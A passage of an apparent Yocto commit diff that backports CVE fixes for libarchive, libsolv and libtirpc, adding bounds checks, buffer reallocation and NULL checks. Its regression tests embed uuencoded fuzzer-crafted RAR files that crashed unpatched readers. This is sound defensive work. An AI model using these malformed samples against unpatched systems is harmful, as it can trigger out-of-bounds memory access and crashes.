libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu + +--- a/Makefile.am ++++ b/Makefile.am +@@ -883,6 +883,7 @@ libarchive_test_EXTRA_DIST=\ + libarchive/test/test_read_format_rar5_arm_filter_on_window_boundary.rar.uu \ + libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \ + libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \ ++ libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \ + libarchive/test/test_read_format_raw.bufr.uu \ + libarchive/test/test_read_format_raw.data.gz.uu \ + libarchive/test/test_read_format_raw.data.Z.uu \ +--- a/libarchive/archive_read_support_format_rar5.c ++++ b/libarchive/archive_read_support_format_rar5.c +@@ -1012,7 +1012,16 @@ static int read_var_sized(struct archive + return ret; + } + +-static int read_bits_32(struct rar5* rar, const uint8_t* p, uint32_t* value) { ++static int read_bits_32(struct archive_read* a, struct rar5* rar, ++ const uint8_t* p, uint32_t* value) ++{ ++ if(rar->bits.in_addr >= rar->cstate.cur_block_size) { ++ archive_set_error(&a->archive, ++ ARCHIVE_ERRNO_PROGRAMMER, ++ "Premature end of stream during extraction of data (#1)"); ++ return ARCHIVE_FATAL; ++ } ++ + uint32_t bits = ((uint32_t) p[rar->bits.in_addr]) << 24; + bits |= p[rar->bits.in_addr + 1] << 16; + bits |= p[rar->bits.in_addr + 2] << 8; +@@ -1023,7 +1032,16 @@ static int read_bits_32(struct rar5* rar + return ARCHIVE_OK; + } + +-static int read_bits_16(struct rar5* rar, const uint8_t* p, uint16_t* value) { ++static int read_bits_16(struct archive_read* a, struct rar5* rar, ++ const uint8_t* p, uint16_t* value) ++{ ++ if(rar->bits.in_addr >= rar->cstate.cur_block_size) { ++ archive_set_error(&a->archive, ++ ARCHIVE_ERRNO_PROGRAMMER, ++ "Premature end of stream during extraction of data (#2)"); ++ return ARCHIVE_FATAL; ++ } ++ + int bits = (int) ((uint32_t) p[rar->bits.in_addr]) << 16; + bits |= (int) p[rar->bits.in_addr + 1] << 8; + bits |= (int) p[rar->bits.in_addr + 2]; +@@ -1039,8 +1057,8 @@ static void skip_bits(struct rar5* rar, + } + + /* n = up to 16 */ +-static int read_consume_bits(struct rar5* rar, const uint8_t* p, int n, +- int* value) ++static int read_consume_bits(struct archive_read* a, struct rar5* rar, ++ const uint8_t* p, int n, int* value) + { + uint16_t v; + int ret, num; +@@ -1051,7 +1069,7 @@ static int read_consume_bits(struct rar5 + return ARCHIVE_FATAL; + } + +- ret = read_bits_16(rar, p, &v); ++ ret = read_bits_16(a, rar, p, &v); + if(ret != ARCHIVE_OK) + return ret; + +@@ -2425,13 +2443,13 @@ static int create_decode_tables(uint8_t* + static int decode_number(struct archive_read* a, struct decode_table* table, + const uint8_t* p, uint16_t* num) + { +- int i, bits, dist; ++ int i, bits, dist, ret; + uint16_t bitfield; + uint32_t pos; + struct rar5* rar = get_context(a); + +- if(ARCHIVE_OK != read_bits_16(rar, p, &bitfield)) { +- return ARCHIVE_EOF; ++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &bitfield))) { ++ return ret; + } + + bitfield &= 0xfffe; +@@ -2537,14 +2555,6 @@ static int parse_tables(struct archive_r + for(i = 0; i < HUFF_TABLE_SIZE;) { + uint16_t num; + +- if((rar->bits.in_addr + 6) >= rar->cstate.cur_block_size) { +- /* Truncated data, can't continue. */ +- archive_set_error(&a->archive, +- ARCHIVE_ERRNO_FILE_FORMAT, +- "Truncated data in huffman tables (#2)"); +- return ARCHIVE_FATAL; +- } +- + ret = decode_number(a, &rar->cstate.bd, p, &num); + if(ret != ARCHIVE_OK) { + archive_set_error(&a->archive, +@@ -2561,8 +2571,8 @@ static int parse_tables(struct archive_r + /* 16..17: repeat previous code */ + uint16_t n; + +- if(ARCHIVE_OK != read_bits_16(rar, p, &n)) +- return ARCHIVE_EOF; ++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n))) ++ return ret; + + if(num == 16) { + n >>= 13; +@@ -2590,8 +2600,8 @@ static int parse_tables(struct archive_r + /* other codes: fill with zeroes `n` times */ + uint16_t n; + +- if(ARCHIVE_OK != read_bits_16(rar, p, &n)) +- return ARCHIVE_EOF; ++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n))) ++ return ret; + + if(num == 18) { + n >>= 13; +@@ -2707,22 +2717,22 @@ static int parse_block_header(struct arc + } + + /* Convenience function used during filter processing. */ +-static int parse_filter_data(struct rar5* rar, const uint8_t* p, +- uint32_t* filter_data) ++static int parse_filter_data(struct archive_read* a, struct rar5* rar, ++ const uint8_t* p, uint32_t* filter_data) + { +- int i, bytes; ++ int i, bytes, ret; + uint32_t data = 0; + +- if(ARCHIVE_OK != read_consume_bits(rar, p, 2, &bytes)) +- return ARCHIVE_EOF; ++ if(ARCHIVE_OK != (ret = read_consume_bits(a, rar, p, 2, &bytes))) ++ return ret; + + bytes++; + + for(i = 0; i < bytes; i++) { + uint16_t byte; + +- if(ARCHIVE_OK != read_bits_16(rar, p, &byte)) { +- return ARCHIVE_EOF; ++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &byte))) { ++ return ret; + } + + /* Cast to uint32_t will ensure the shift operation will not +@@ -2765,16 +2775,17 @@ static int parse_filter(struct archive_r + uint16_t filter_type; + struct filter_info* filt = NULL; + struct rar5* rar = get_context(ar); ++ int ret; + + /* Read the parameters from the input stream. */ +- if(ARCHIVE_OK != parse_filter_data(rar, p, &block_start)) +- return ARCHIVE_EOF; ++ if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_start))) ++ return ret; + +- if(ARCHIVE_OK != parse_filter_data(rar, p, &block_length)) +- return ARCHIVE_EOF; ++ if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_length))) ++ return ret; + +- if(ARCHIVE_OK != read_bits_16(rar, p, &filter_type)) +- return ARCHIVE_EOF; ++ if(ARCHIVE_OK != (ret = read_bits_16(ar, rar, p, &filter_type))) ++ return ret; + + filter_type >>= 13; + skip_bits(rar, 3); +@@ -2814,8 +2825,8 @@ static int parse_filter(struct archive_r + if(filter_type == FILTER_DELTA) { + int channels; + +- if(ARCHIVE_OK != read_consume_bits(rar, p, 5, &channels)) +- return ARCHIVE_EOF; ++ if(ARCHIVE_OK != (ret = read_consume_bits(ar, rar, p, 5, &channels))) ++ return ret; + + filt->channels = channels + 1; + } +@@ -2823,10 +2834,11 @@ static int parse_filter(struct archive_r + return ARCHIVE_OK; + } + +-static int decode_code_length(struct rar5* rar, const uint8_t* p, +- uint16_t code) ++static int decode_code_length(struct archive_read* a, struct rar5* rar, ++ const uint8_t* p, uint16_t code) + { + int lbits, length = 2; ++ + if(code < 8) { + lbits = 0; + length += code; +@@ -2838,7 +2850,7 @@ static int decode_code_length(struct rar + if(lbits > 0) { + int add; + +- if(ARCHIVE_OK != read_consume_bits(rar, p, lbits, &add)) ++ if(ARCHIVE_OK != read_consume_bits(a, rar, p, lbits, &add)) + return -1; + + length += add; +@@ -2933,7 +2945,7 @@ static int do_uncompress_block(struct ar + continue; + } else if(num >= 262) { + uint16_t dist_slot; +- int len = decode_code_length(rar, p, num - 262), ++ int len = decode_code_length(a, rar, p, num - 262), + dbits, + dist = 1; + +@@ -2975,12 +2987,12 @@ static int do_uncompress_block(struct ar + uint16_t low_dist; + + if(dbits > 4) { +- if(ARCHIVE_OK != read_bits_32( +- rar, p, &add)) { ++ if(ARCHIVE_OK != (ret = read_bits_32( ++ a, rar, p, &add))) { + /* Return EOF if we + * can't read more + * data. */ +- return ARCHIVE_EOF; ++ return ret; + } + + skip_bits(rar, dbits - 4); +@@ -3015,11 +3027,11 @@ static int do_uncompress_block(struct ar + /* dbits is one of [0,1,2,3] */ + int add; + +- if(ARCHIVE_OK != read_consume_bits(rar, +- p, dbits, &add)) { ++ if(ARCHIVE_OK != (ret = read_consume_bits(a, rar, ++ p, dbits, &add))) { + /* Return EOF if we can't read + * more data. */ +- return ARCHIVE_EOF; ++ return ret; + } + + dist += add; +@@ -3076,7 +3088,11 @@ static int do_uncompress_block(struct ar + return ARCHIVE_FATAL; + } + +- len = decode_code_length(rar, p, len_slot); ++ len = decode_code_length(a, rar, p, len_slot); ++ if (len == -1) { ++ return ARCHIVE_FATAL; ++ } ++ + rar->cstate.last_len = len; + + if(ARCHIVE_OK != copy_string(a, len, dist)) +--- a/libarchive/test/test_read_format_rar5.c ++++ b/libarchive/test/test_read_format_rar5.c +@@ -1271,3 +1271,20 @@ DEFINE_TEST(test_read_format_rar5_block_ + + EPILOGUE(); + } ++ ++DEFINE_TEST(test_read_format_rar5_decode_number_out_of_bounds_read) ++{ ++ /* oss fuzz 30448 */ ++ ++ char buf[4096]; ++ PROLOGUE("test_read_format_rar5_decode_number_out_of_bounds_read.rar"); ++ ++ /* Return codes of those calls are ignored, because this sample file ++ * is invalid. However, the unpacker shouldn't produce any SIGSEGV ++ * errors during processing. */ ++ ++ (void) archive_read_next_header(a, &ae); ++ while(0 < archive_read_data(a, buf, sizeof(buf))) {} ++ ++ EPILOGUE(); ++} +--- /dev/null ++++ b/libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu +@@ -0,0 +1,10 @@ ++begin 644 test_read_format_rar5_decode_number_out_of_bounds_read.rar ++M4F%R(1H'`0!3@"KT`P+G(@(0("`@@`L!!"`@("`@(($D_[BJ2"!::7!)210V ++M+0#ZF#)Q!`+>YPW_("`@("``_R````````````````````````````!__P`` ++M``````!T72`@/EW_(/\@("`@("`@("`@("`@("`@("`@("`@("`@(/\@("`@ ++M("`@("#_("`@("`@("`@("`@("`@("`@("`@("`@("#_("`@("`@("`@_R`@ ++M("`@("`@("`@("`@("`@("`@("`@("`@_R`@("`@("`@(/\@("`@("`@("`@ ++M("`@("`@("`@("`@("`@(/\@("`@("`@("#_("`@("`@("`@("`@("`@("`@ ++E("`@("`@("#_("`@("`@("`@_R`@("`@("`@("`@("`@("`@(``` ++` ++end diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch new file mode 100644 index 0000000000..b5da44ec7b --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch @@ -0,0 +1,121 @@ +From 17f4e83c0f0fc3bacf4b2bbacb01f987bb5aff5f Mon Sep 17 00:00:00 2001 +From: Grzegorz Antoniak <ga@anadoxin.org> +Date: Fri, 12 Feb 2021 20:18:31 +0100 +Subject: [PATCH] RAR5 reader: fix invalid memory access in some files + +RAR5 reader uses several variables to manage the window buffer during +extraction: the buffer itself (`window_buf`), the current size of the +window buffer (`window_size`), and a helper variable (`window_mask`) +that is used to constrain read and write offsets to the window buffer. + +Some specially crafted files can force the unpacker to update the +`window_mask` variable to a value that is out of sync with current +buffer size. If the `window_mask` will be bigger than the actual buffer +size, then an invalid access operation can happen (SIGSEGV). + +This commit ensures that if the `window_size` and `window_mask` will be +changed, the window buffer will be reallocated to the proper size, so no +invalid memory operation should be possible. + +This commit contains a test file from OSSFuzz #30442. + +Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-2.patch?h=applied/3.4.3-2ubuntu0.1] +CVE: CVE-2021-36976 +Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com> + +--- + Makefile.am | 1 + + libarchive/archive_read_support_format_rar5.c | 27 ++++++++++++++----- + libarchive/test/test_read_format_rar5.c | 17 ++++++++++++ + ...mat_rar5_window_buf_and_size_desync.rar.uu | 11 ++++++++ + 4 files changed, 50 insertions(+), 6 deletions(-) + create mode 100644 libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu + +--- a/Makefile.am ++++ b/Makefile.am +@@ -884,6 +884,7 @@ libarchive_test_EXTRA_DIST=\ + libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \ + libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \ + libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \ ++ libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \ + libarchive/test/test_read_format_raw.bufr.uu \ + libarchive/test/test_read_format_raw.data.gz.uu \ + libarchive/test/test_read_format_raw.data.Z.uu \ +--- a/libarchive/archive_read_support_format_rar5.c ++++ b/libarchive/archive_read_support_format_rar5.c +@@ -1730,14 +1730,29 @@ static int process_head_file(struct arch + } + } + +- /* If we're currently switching volumes, ignore the new definition of +- * window_size. */ +- if(rar->cstate.switch_multivolume == 0) { +- /* Values up to 64M should fit into ssize_t on every +- * architecture. */ +- rar->cstate.window_size = (ssize_t) window_size; ++ if(rar->cstate.window_size < (ssize_t) window_size && ++ rar->cstate.window_buf) ++ { ++ /* If window_buf has been allocated before, reallocate it, so ++ * that its size will match new window_size. */ ++ ++ uint8_t* new_window_buf = ++ realloc(rar->cstate.window_buf, window_size); ++ ++ if(!new_window_buf) { ++ archive_set_error(&a->archive, ARCHIVE_ERRNO_PROGRAMMER, ++ "Not enough memory when trying to realloc the window " ++ "buffer."); ++ return ARCHIVE_FATAL; ++ } ++ ++ rar->cstate.window_buf = new_window_buf; + } + ++ /* Values up to 64M should fit into ssize_t on every ++ * architecture. */ ++ rar->cstate.window_size = (ssize_t) window_size; ++ + if(rar->file.solid > 0 && rar->file.solid_window_size == 0) { + /* Solid files have to have the same window_size across + whole archive. Remember the window_size parameter +--- a/libarchive/test/test_read_format_rar5.c ++++ b/libarchive/test/test_read_format_rar5.c +@@ -1206,6 +1206,23 @@ DEFINE_TEST(test_read_format_rar5_differ + EPILOGUE(); + } + ++DEFINE_TEST(test_read_format_rar5_window_buf_and_size_desync) ++{ ++ /* oss fuzz 30442 */ ++ ++ char buf[4096]; ++ PROLOGUE("test_read_format_rar5_window_buf_and_size_desync.rar"); ++ ++ /* Return codes of those calls are ignored, because this sample file ++ * is invalid. However, the unpacker shouldn't produce any SIGSEGV ++ * errors during processing. */ ++ ++ (void) archive_read_next_header(a, &ae); ++ while(0 < archive_read_data(a, buf, 46)) {} ++ ++ EPILOGUE(); ++} ++ + DEFINE_TEST(test_read_format_rar5_arm_filter_on_window_boundary) + { + char buf[4096]; +--- /dev/null ++++ b/libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu +@@ -0,0 +1,11 @@ ++begin 644 test_read_format_rar5_window_buf_and_size_desync.rar ++M4F%R(1H'`0`]/-[E`@$`_P$`1#[Z5P("`PL``BXB"?\`!(@B@0`)6.-AF?_1 ++M^0DI&0GG(F%R(0<:)`!3@"KT`P+G(@O_X[\``#&``(?!!0$$[:L``$.M*E)A ++M<B$`O<\>P0";/P1%``A*2DI*2DYQ<6TN9'%*2DI*2DI*``!D<F--``````"Z ++MNC*ZNKJZNFYO=&%I;+JZNKJZNKJZOKJZ.KJZNKJZNKKZU@4%````0$!`0$!` ++M0$!`0$!`0$!`0$#_________/T#`0$!`0$!`-UM`0$!`0$!`0$!`0$!`0$!` ++M0$!`0'!,J+:O!IZ-WN4'@`!3*F0````````````````````````````````` ++M``````````````#T`P)287(A&@<!`%.`*O0#`N<B`_,F@`'[__\``(`4`01S ++J'`/H/O\H@?\D`#O9GIZ>GN<B"_]%``(``&1RGIZ>GIZ>8_^>GE/_``!. ++` ++end diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch new file mode 100644 index 0000000000..0e1549f229 --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch @@ -0,0 +1,93 @@ +From 313bcd7ac547f7cc25945831f63507420c0874d7 Mon Sep 17 00:00:00 2001 +From: Grzegorz Antoniak <ga@anadoxin.org> +Date: Sat, 13 Feb 2021 10:13:22 +0100 +Subject: [PATCH] RAR5 reader: add more checks for invalid extraction + parameters + +Some specially crafted files declare invalid extraction parameters that +can confuse the RAR5 reader. + +One of the arguments is the declared window size parameter that the +archive file can declare for each file stored in the archive. Some +crafted files declare window size equal to 0, which is clearly wrong. + +This commit adds additional safety checks decreasing the tolerance of +the RAR5 format. + +This commit also contains OSSFuzz sample #30459. +--- + Makefile.am | 1 + + libarchive/archive_read_support_format_rar5.c | 10 ++++++++++ + libarchive/test/test_read_format_rar5.c | 19 +++++++++++++++++++ + ...t_rar5_bad_window_sz_in_mltarc_file.rar.uu | 7 +++++++ + 4 files changed, 37 insertions(+) + create mode 100644 libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu + +Upstream-Status: Backport [https://github.com/libarchive/libarchive/pull/1493/commits/313bcd7ac547f7cc25945831f63507420c0874d7] +CVE: CVE-2021-36976 +Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com> + +--- libarchive-3.4.2.orig/Makefile.am ++++ libarchive-3.4.2/Makefile.am +@@ -882,6 +882,7 @@ libarchive_test_EXTRA_DIST=\ + libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \ + libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \ + libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \ ++ libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu \ + libarchive/test/test_read_format_raw.bufr.uu \ + libarchive/test/test_read_format_raw.data.gz.uu \ + libarchive/test/test_read_format_raw.data.Z.uu \ +--- libarchive-3.4.2.orig/libarchive/archive_read_support_format_rar5.c ++++ libarchive-3.4.2/libarchive/archive_read_support_format_rar5.c +@@ -3637,6 +3637,16 @@ static int do_uncompress_file(struct arc + rar->cstate.initialized = 1; + } + ++ /* Don't allow extraction if window_size is invalid. */ ++ if(rar->cstate.window_size == 0) { ++ archive_set_error(&a->archive, ++ ARCHIVE_ERRNO_FILE_FORMAT, ++ "Invalid window size declaration in this file"); ++ ++ /* This should never happen in valid files. */ ++ return ARCHIVE_FATAL; ++ } ++ + if(rar->cstate.all_filters_applied == 1) { + /* We use while(1) here, but standard case allows for just 1 + * iteration. The loop will iterate if process_block() didn't +--- libarchive-3.4.2.orig/libarchive/test/test_read_format_rar5.c ++++ libarchive-3.4.2/libarchive/test/test_read_format_rar5.c +@@ -1305,3 +1305,22 @@ DEFINE_TEST(test_read_format_rar5_decode + + EPILOGUE(); + } ++ ++DEFINE_TEST(test_read_format_rar5_bad_window_size_in_multiarchive_file) ++{ ++ /* oss fuzz 30459 */ ++ ++ char buf[4096]; ++ PROLOGUE("test_read_format_rar5_bad_window_sz_in_mltarc_file.rar"); ++ ++ /* This file is damaged, so those functions should return failure. ++ * Additionally, SIGSEGV shouldn't be raised during execution ++ * of those functions. */ ++ ++ (void) archive_read_next_header(a, &ae); ++ while(0 < archive_read_data(a, buf, sizeof(buf))) {} ++ (void) archive_read_next_header(a, &ae); ++ while(0 < archive_read_data(a, buf, sizeof(buf))) {} ++ ++ EPILOGUE(); ++} +--- /dev/null ++++ libarchive-3.4.2/libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu +@@ -0,0 +1,7 @@ ++begin 644 test_read_format_rar5_bad_window_size_in_multiarchive_file.rar ++M4F%R(1H'`0`]/-[E`@$`_R`@1#[Z5P("`PL`("`@@"(`"?\@("#___\@("`@ ++M("`@("`@("`@4X`J]`,"YR(#$($@("`@``$@("`@@<L0("`@("`@("`@("`@ ++M("`@(""LCTJA`P$%`B`@`2!3@"KT`P+G(@,@("`@_P,!!B`@(/___R`@(('+ ++5$"`OX2`@[.SL[.S_("`@("`@("`@ ++` ++end diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch new file mode 100644 index 0000000000..501fcc5848 --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch @@ -0,0 +1,29 @@ +From cfaa28168a07ea4a53276b63068f94fce37d6aff Mon Sep 17 00:00:00 2001 +From: Tim Kientzle <kientzle@acm.org> +Date: Thu, 24 Mar 2022 10:35:00 +0100 +Subject: [PATCH] ZIP reader: fix possible out-of-bounds read in + zipx_lzma_alone_init() + +Fixes #1672 + +CVE: CVE-2022-26280 +Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/cfaa28168a07ea4a53276b63068f94fce37d6aff] +Signed-off-by: Andrej Valek <andrej.valek@siemens.com> + +--- + libarchive/archive_read_support_format_zip.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/libarchive/archive_read_support_format_zip.c b/libarchive/archive_read_support_format_zip.c +index 38ada70b5..9d6c900b2 100644 +--- a/libarchive/archive_read_support_format_zip.c ++++ b/libarchive/archive_read_support_format_zip.c +@@ -1667,7 +1667,7 @@ zipx_lzma_alone_init(struct archive_read *a, struct zip *zip) + */ + + /* Read magic1,magic2,lzma_params from the ZIPX stream. */ +- if((p = __archive_read_ahead(a, 9, NULL)) == NULL) { ++ if(zip->entry_bytes_remaining < 9 || (p = __archive_read_ahead(a, 9, NULL)) == NULL) { + archive_set_error(&a->archive, ARCHIVE_ERRNO_FILE_FORMAT, + "Truncated lzma data"); + return (ARCHIVE_FATAL); diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch new file mode 100644 index 0000000000..980a0e884a --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch @@ -0,0 +1,43 @@ +From 6311080bff566fcc5591dadfd78efb41705b717f Mon Sep 17 00:00:00 2001 +From: obiwac <obiwac@gmail.com> +Date: Fri, 22 Jul 2022 22:41:10 +0200 +Subject: [PATCH] CVE-2022-36227 + +libarchive: CVE-2022-36227 Handle a `calloc` returning NULL (fixes #1754) + +Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/bff38efe8c110469c5080d387bec62a6ca15b1a5] +CVE: CVE-2022-36227 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com +--- + libarchive/archive_write.c | 8 ++++++++ + 1 file changed, 8 insertions(+) + +diff --git a/libarchive/archive_write.c b/libarchive/archive_write.c +index 98a55fb..7fe88b6 100644 +--- a/libarchive/archive_write.c ++++ b/libarchive/archive_write.c +@@ -211,6 +211,10 @@ __archive_write_allocate_filter(struct archive *_a) + struct archive_write_filter *f; + + f = calloc(1, sizeof(*f)); ++ ++ if (f == NULL) ++ return (NULL); ++ + f->archive = _a; + f->state = ARCHIVE_WRITE_FILTER_STATE_NEW; + if (a->filter_first == NULL) +@@ -527,6 +531,10 @@ archive_write_open(struct archive *_a, void *client_data, + a->client_data = client_data; + + client_filter = __archive_write_allocate_filter(_a); ++ ++ if (client_filter == NULL) ++ return (ARCHIVE_FATAL); ++ + client_filter->open = archive_write_client_open; + client_filter->write = archive_write_client_write; + client_filter->close = archive_write_client_close; +-- +2.25.1 + diff --git a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb index 0ab40fc096..728eedc401 100644 --- a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb +++ b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb @@ -32,11 +32,23 @@ PACKAGECONFIG[mbedtls] = "--with-mbedtls,--without-mbedtls,mbedtls," EXTRA_OECONF += "--enable-largefile" -SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz" +SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz \ + file://CVE-2021-36976-1.patch \ + file://CVE-2021-36976-2.patch \ + file://CVE-2021-36976-3.patch \ + file://CVE-2021-23177.patch \ + file://CVE-2021-31566-01.patch \ + file://CVE-2021-31566-02.patch \ + file://CVE-2022-26280.patch \ + file://CVE-2022-36227.patch \ +" SRC_URI[md5sum] = "d953ed6b47694dadf0e6042f8f9ff451" SRC_URI[sha256sum] = "b60d58d12632ecf1e8fad7316dc82c6b9738a35625746b47ecdcaf4aed176176" +# upstream-wontfix: upstream has documented that reported function is not thread-safe +CVE_CHECK_WHITELIST += "CVE-2023-30571" + inherit autotools update-alternatives pkgconfig CPPFLAGS += "-I${WORKDIR}/extra-includes" diff --git a/meta/recipes-extended/libnsl/libnsl2_git.bb b/meta/recipes-extended/libnsl/libnsl2_git.bb index 28c84af7ad..cbb38674b9 100644 --- a/meta/recipes-extended/libnsl/libnsl2_git.bb +++ b/meta/recipes-extended/libnsl/libnsl2_git.bb @@ -14,7 +14,7 @@ PV = "1.2.0+git${SRCPV}" SRCREV = "4a062cf4180d99371198951e4ea5b4550efd58a3" -SRC_URI = "git://github.com/thkukuk/libnsl \ +SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/meta/recipes-extended/libnss-nis/libnss-nis.bb b/meta/recipes-extended/libnss-nis/libnss-nis.bb index a1d914e871..0ec64544be 100644 --- a/meta/recipes-extended/libnss-nis/libnss-nis.bb +++ b/meta/recipes-extended/libnss-nis/libnss-nis.bb @@ -13,11 +13,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" SECTION = "libs" DEPENDS += "libtirpc libnsl2" -PV = "3.1+git${SRCPV}" +PV = "3.2" -SRCREV = "062f31999b35393abf7595cb89dfc9590d5a42ad" +SRCREV = "cd0d391af9535b56e612ed227c1b89be269f3d59" -SRC_URI = "git://github.com/thkukuk/libnss_nis \ +SRC_URI = "git://github.com/thkukuk/libnss_nis;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch new file mode 100644 index 0000000000..fa577fd533 --- /dev/null +++ b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch @@ -0,0 +1,82 @@ +From 0077ef29eb46d2e1df2f230fc95a1d9748d49dec Mon Sep 17 00:00:00 2001 +From: Michael Schroeder <mls@suse.de> +Date: Mon, 14 Dec 2020 11:12:00 +0100 +Subject: [PATCH] testcase_read: error out if repos are added or the system is + changed too late + +We must not add new solvables after the considered map was created, the solver +was created, or jobs were added. We may not changed the system after jobs have +been added. + +(Jobs may point inside the whatproviedes array, so we must not invalidate this +area.) + +Upstream-Status: Backport [https://github.com/openSUSE/libsolv/commit/0077ef29eb46d2e1df2f230fc95a1d9748d49dec] +CVE: CVE-2021-3200 +CVE: CVE-2021-33928 +CVE: CVE-2021-33929 +CVE: CVE-2021-33930 +CVE: CVE-2021-33938 +CVE: CVE-2021-44568 +CVE: CVE-2021-44569 +CVE: CVE-2021-44570 +CVE: CVE-2021-44571 +CVE: CVE-2021-44573 +CVE: CVE-2021-44574 +CVE: CVE-2021-44575 +CVE: CVE-2021-44576 +CVE: CVE-2021-44577 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> +Signed-off-by: Steve Sakoman <steve@sakoman.com> +--- + ext/testcase.c | 21 +++++++++++++++++++++ + 1 file changed, 21 insertions(+) + +diff --git a/ext/testcase.c b/ext/testcase.c +index 0be7a213..8fb6d793 100644 +--- a/ext/testcase.c ++++ b/ext/testcase.c +@@ -1991,6 +1991,7 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res + Id *genid = 0; + int ngenid = 0; + Queue autoinstq; ++ int oldjobsize = job ? job->count : 0; + + if (resultp) + *resultp = 0; +@@ -2065,6 +2066,21 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res + int prio, subprio; + const char *rdata; + ++ if (pool->considered) ++ { ++ pool_error(pool, 0, "testcase_read: cannot add repos after packages were disabled"); ++ continue; ++ } ++ if (solv) ++ { ++ pool_error(pool, 0, "testcase_read: cannot add repos after the solver was created"); ++ continue; ++ } ++ if (job && job->count != oldjobsize) ++ { ++ pool_error(pool, 0, "testcase_read: cannot add repos after jobs have been created"); ++ continue; ++ } + prepared = 0; + if (!poolflagsreset) + { +@@ -2125,6 +2141,11 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res + int i; + + /* must set the disttype before the arch */ ++ if (job && job->count != oldjobsize) ++ { ++ pool_error(pool, 0, "testcase_read: cannot change the system after jobs have been created"); ++ continue; ++ } + prepared = 0; + if (strcmp(pieces[2], "*") != 0) + { diff --git a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb index 1cf5e2eb29..2c2aedc32c 100644 --- a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb +++ b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb @@ -8,7 +8,8 @@ LIC_FILES_CHKSUM = "file://LICENSE.BSD;md5=62272bd11c97396d4aaf1c41bc11f7d8" DEPENDS = "expat zlib" -SRC_URI = "git://github.com/openSUSE/libsolv.git \ +SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \ + file://CVE-2021-3200.patch \ " SRCREV = "605dd2645ef899e2b7c95709476fb51e28d7e378" diff --git a/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch new file mode 100644 index 0000000000..c78e7ef4d5 --- /dev/null +++ b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch @@ -0,0 +1,155 @@ +From 48309e7cb230fc539c3edab0b3363f8ce973194f Mon Sep 17 00:00:00 2001 +From: Hitendra Prajapati <hprajapati@mvista.com> +Date: Thu, 28 Jul 2022 09:11:04 +0530 +Subject: [PATCH] CVE-2021-46828 + +Upstream-Status: Backport 